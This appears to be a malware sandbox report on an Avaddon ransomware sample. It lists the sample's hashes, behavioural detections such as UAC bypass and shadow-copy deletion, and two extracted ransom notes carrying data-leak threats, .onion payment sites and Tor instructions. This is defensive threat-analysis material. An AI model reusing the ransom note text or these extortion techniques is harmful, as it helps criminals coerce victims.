MjY2NC1kdFhJU2o3cnpKTzNnYnpZYlJJanc2WTMvczk1SVpHRStRcTUzOHVNNzRJbWp1S0hMK002eW5DQ0VocWlXaUtPZTBMdEtXUnk1Z3VtSkRsQmMySDFyT0FxcVZpQ0U5SGZuZGRjUnBGb29ieHBDRGtKei9WQldxaFZYaUVQYW90bXNldDhQanpINWk1TVJ2bDJXaEp1Z2hBSm9tbmVISm9sVytnN2xRV0JzYld5bnFaWDVUSTByY0VNTTk2SHd0aFc4R1YwZ1hodERseEtyTjhSSWhidVJBbzFVajhCajh1YkNVRElYb0VMVWVLRVE3ZHdpclc5bDJWZ1E0cjVsZlNhMWxxV2N4cGN3M0cxRUU3eTlRWXJxUkkwT0sxcXV6MzNCQitHVXBHNWFHK2pyV2ZoTTF2Y1RBbHpyemZTenpVOHBtNHA3YTFNYi9VaTRTUTFaRXRPQUVDdFFBVzFrZ09iTjV2cXlCamEwZFJrZjhFTDRKTVliNHd0RUdaSHJKenB3NWU1TGIyczhrVVdzNyszRTROR0V3Z3JLd0hvcXIyVmNqOE43djg3b25uQmFaQ05WQ2lwNUZQT0FCaEIwRmVmODNlcEFQdlhWTUlMS1lXVUxzZUdDODBiZnhZanJHRUcrL09yOWpDUVU3aXRXaTVicU9iL1NOWEtkT3Y4ZkhJbmR6SzJZQ0s5ajNHR1JuM3FvT0tJN3FIcHE3WDVLZWhKSkxKek5TSXN0OHNaN3I4RjFWRXA2UFA3Vnl3OExYRWZjMUVIMk1DOEc0REVIM284bUp3RUZPMklORVdXWnVQUjJ3US8ydmo2c3l3YWVaNGdMMWJKR3pCVjZhSEJhaWhDUTMyVzlCbFUrdXhHeHlRbWlmVVUvM3lKZmtsQXZEM1BPdUVLemJJT1hJOGRycHB6L3dtYkZpVUVPL3pPS0tQeERzVXVEdW8wZFl0aXkvRXZIS0krOGdaS0lWdldQekIyZm1yc1M5clhlWkx1WGV6ZkZKbUZNZ1BFdUFTakRxZzE1ODM4b0lvRGxDbmhYMmZPN0dLMEl1NHdHSTN4eFRMa1VMTG1qOVBRcTdNaU1vVndwbXRSOHF6MXNXUzY1Si9xYVVaYW11ODE0N09SbkU0ZW1ZOFV0N3BPd0ZPbkZnUUM2MVJ2QUQzd1ozeitSSElZckJIQVJBQ2dMbzVPTGZlb1NueVZMelRRaTEwVzZWdUZrKzNjK1hGZEFWbmE1WEdSd0NVd2xqd2RBbnZFcTRzT3BpNEIvMGkrd1BVMWEyeDR0ZVlkajU3RW9aL2F5TzhOOXBHOTdHdEJ4L2NZWWtsekRScm5POFQzMVUvY2kvUUt1OXlsK3JmT25CRGJJRmtlcTZ1T2RFV0NxbEJ5L25xQ1VRRVR2akZkQlM3ZnZVRmgrQzhsek9IYWUvcksxaWNzcWd4UjNrQ3MxTVdpekpsNTlLSlppcm5PbTlNZ3ZvZHhRSGJ6ZllKWStkOFR4U3pwaUtmSWdjaUcrQXRYZXVXNTBUallWZEhiZ0tRNDJCZERzcmRLOFhNajZlc2VhTVZ2Z2QvRWlSRy9Dakl5TTdjazVuN044ZVN5ODB0aDJVQWVtR2tuT25ralNJTkoycW1rV2NNVkMzZllxaGdqQ0E3Q0FTZ28rQmdwbkhFMUljV0QrY3RFQ1hLSWR1VU5OQ2JvVllvdVQ3bkk3NndHMkJnRVY5SUsvZ09UWG00ZHlCUldlWXhLUXBYU3BEQVNzMmcvVjdjeStZaWVkS3ZndDNXWDVGRTdDWDRCWU1jcjZtMU8wUzBVdEJFSEc4S2czRmdDNEt3TkJGcDBienloYjdGbURpNlNySkdJZWJkVHl2TnhwczVleDJ5c290dHVjcDRXSWswOWdKaVFCTTZPcUJsbzF6NGE2aWdUaDJWL1VPQnpPTHNhOGNXSysrMk1JSW92V054Qm9HSVc1TDZJK0J5VkZrYXBnZ1F0OGwxbmw1bDVDdmJ4amk2M3h1Mm9sZHFxTENRbFFrcUpUckk5WGE2MExIYlJzSTlkYkR1SmhlV28zSDVGRzF1WEFkNHAzKzU4alJaYXhkbVprN0FQbzJnUFZWSDROdk1IdUptdWlnOGFjVytZcEtpK3FIZWl4ZnFqQS9aODNmRzRpS2VGNXRYRWVBVHFvUT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * 2DheQ3SvhsfJI50UxzseVWd9XVjo

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Pictures\DfN2W_readme_.txt

Family

avaddon

Ransom Note

-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aaDbcCCADB You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info. You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- MjY2NC1kdFhJU2o3cnpKTzNnYnpZYlJJanc2WTMvczk1SVpHRStRcTUzOHVNNzRJbWp1S0hMK002eW5DQ0VocWlXaUtPZTBMdEtXUnk1Z3VtSkRsQmMySDFyT0FxcVZpQ0U5SGZuZGRjUnBGb29ieHBDRGtKei9WQldxaFZYaUVQYW90bXNldDhQanpINWk1TVJ2bDJXaEp1Z2hBSm9tbmVISm9sVytnN2xRV0JzYld5bnFaWDVUSTByY0VNTTk2SHd0aFc4R1YwZ1hodERseEtyTjhSSWhidVJBbzFVajhCajh1YkNVRElYb0VMVWVLRVE3ZHdpclc5bDJWZ1E0cjVsZlNhMWxxV2N4cGN3M0cxRUU3eTlRWXJxUkkwT0sxcXV6MzNCQitHVXBHNWFHK2pyV2ZoTTF2Y1RBbHpyemZTenpVOHBtNHA3YTFNYi9VaTRTUTFaRXRPQUVDdFFBVzFrZ09iTjV2cXlCamEwZFJrZjhFTDRKTVliNHd0RUdaSHJKenB3NWU1TGIyczhrVVdzNyszRTROR0V3Z3JLd0hvcXIyVmNqOE43djg3b25uQmFaQ05WQ2lwNUZQT0FCaEIwRmVmODNlcEFQdlhWTUlMS1lXVUxzZUdDODBiZnhZanJHRUcrL09yOWpDUVU3aXRXaTVicU9iL1NOWEtkT3Y4ZkhJbmR6SzJZQ0s5ajNHR1JuM3FvT0tJN3FIcHE3WDVLZWhKSkxKek5TSXN0OHNaN3I4RjFWRXA2UFA3Vnl3OExYRWZjMUVIMk1DOEc0REVIM284bUp3RUZPMklORVdXWnVQUjJ3US8ydmo2c3l3YWVaNGdMMWJKR3pCVjZhSEJhaWhDUTMyVzlCbFUrdXhHeHlRbWlmVVUvM3lKZmtsQXZEM1BPdUVLemJJT1hJOGRycHB6L3dtYkZpVUVPL3pPS0tQeERzVXVEdW8wZFl0aXkvRXZIS0krOGdaS0lWdldQekIyZm1yc1M5clhlWkx1WGV6ZkZKbUZNZ1BFdUFTakRxZzE1ODM4b0lvRGxDbmhYMmZPN0dLMEl1NHdHSTN4eFRMa1VMTG1qOVBRcTdNaU1vVndwbXRSOHF6MXNXUzY1Si9xYVVaYW11ODE0N09SbkU0ZW1ZOFV0N3BPd0ZPbkZnUUM2MVJ2QUQzd1ozeitSSElZckJIQVJBQ2dMbzVPTGZlb1NueVZMelRRaTEwVzZWdUZrKzNjK1hGZEFWbmE1WEdSd0NVd2xqd2RBbnZFcTRzT3BpNEIvMGkrd1BVMWEyeDR0ZVlkajU3RW9aL2F5TzhOOXBHOTdHdEJ4L2NZWWtsekRScm5POFQzMVUvY2kvUUt1OXlsK3JmT25CRGJJRmtlcTZ1T2RFV0NxbEJ5L25xQ1VRRVR2akZkQlM3ZnZVRmgrQzhsek9IYWUvcksxaWNzcWd4UjNrQ3MxTVdpekpsNTlLSlppcm5PbTlNZ3ZvZHhRSGJ6ZllKWStkOFR4U3pwaUtmSWdjaUcrQXRYZXVXNTBUallWZEhiZ0tRNDJCZERzcmRLOFhNajZlc2VhTVZ2Z2QvRWlSRy9Dakl5TTdjazVuN044ZVN5ODB0aDJVQWVtR2tuT25ralNJTkoycW1rV2NNVkMzZllxaGdqQ0E3Q0FTZ28rQmdwbkhFMUljV0QrY3RFQ1hLSWR1VU5OQ2JvVllvdVQ3bkk3NndHMkJnRVY5SUsvZ09UWG00ZHlCUldlWXhLUXBYU3BEQVNzMmcvVjdjeStZaWVkS3ZndDNXWDVGRTdDWDRCWU1jcjZtMU8wUzBVdEJFSEc4S2czRmdDNEt3TkJGcDBienloYjdGbURpNlNySkdJZWJkVHl2TnhwczVleDJ5c290dHVjcDRXSWswOWdKaVFCTTZPcUJsbzF6NGE2aWdUaDJWL1VPQnpPTHNhOGNXSysrMk1JSW92V054Qm9HSVc1TDZJK0J5VkZrYXBnZ1F0OGwxbmw1bDVDdmJ4amk2M3h1Mm9sZHFxTENRbFFrcUpUckk5WGE2MExIYlJzSTlkYkR1SmhlV28zSDVGRzF1WEFkNHAzKzU4alJaYXhkbVprN0FQbzJnUFZWSDROdk1IdUptdWlnOGFjVytZcEtpK3FIZWl4ZnFqQS9aODNmRzRpS2VGNXRYRWVBVHFvUT09 -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * oqERa4tTOwDAe

URLs

http://avaddongun7rngel.onion

http://avaddonbotrxmuyl.onion

Targets

- Target
  
  1228d0f04f0ba82569fc1c0609f9fd6c377a91b9ea44c1e7f9f84b2b90552da2.exe
- Size
  
  775KB
- MD5
  
  0b486fe0503524cfe4726a4022fa6a68
- SHA1
  
  297dea71d489768ce45d23b0f8a45424b469ab00
- SHA256
  
  1228d0f04f0ba82569fc1c0609f9fd6c377a91b9ea44c1e7f9f84b2b90552da2
- SHA512
  
  f4273ca5cc3a9360af67f4b4ee0bf067cf218c5dc8caeafbfa1b809715effe742f2e1f54e4fe9ec8d4b8e3ae697d57f91c2b49bdf203648508d75d4a76f53619
- SSDEEP
  
  24576:TCs99+OXLpMePfI8TgmBTCDqEbOpPtpFhyxfq:5GOXLpMePfzVTCD7gPtLhSfq
Score

10^/10

avaddon evasion ransomware trojan
- Avaddon
  Ransomware-as-a-service first released in June 2020 and currently expanding its userbase among criminal actors.
  ransomware avaddon
- Avaddon payload
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- UAC bypass
  evasion trojan
- Deletes shadow copies
  Ransomware often targets backup files to inhibit system recovery.
  ransomware
- Renames multiple (207) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
  ransomware
- Executes dropped EXE
- Checks whether UAC is enabled
  evasion trojan
- Drops desktop.ini file(s)
- Enumerates connected drives
  Attempts to read the root path of hard drives other than the default C: drive.
behavioral1 behavioral2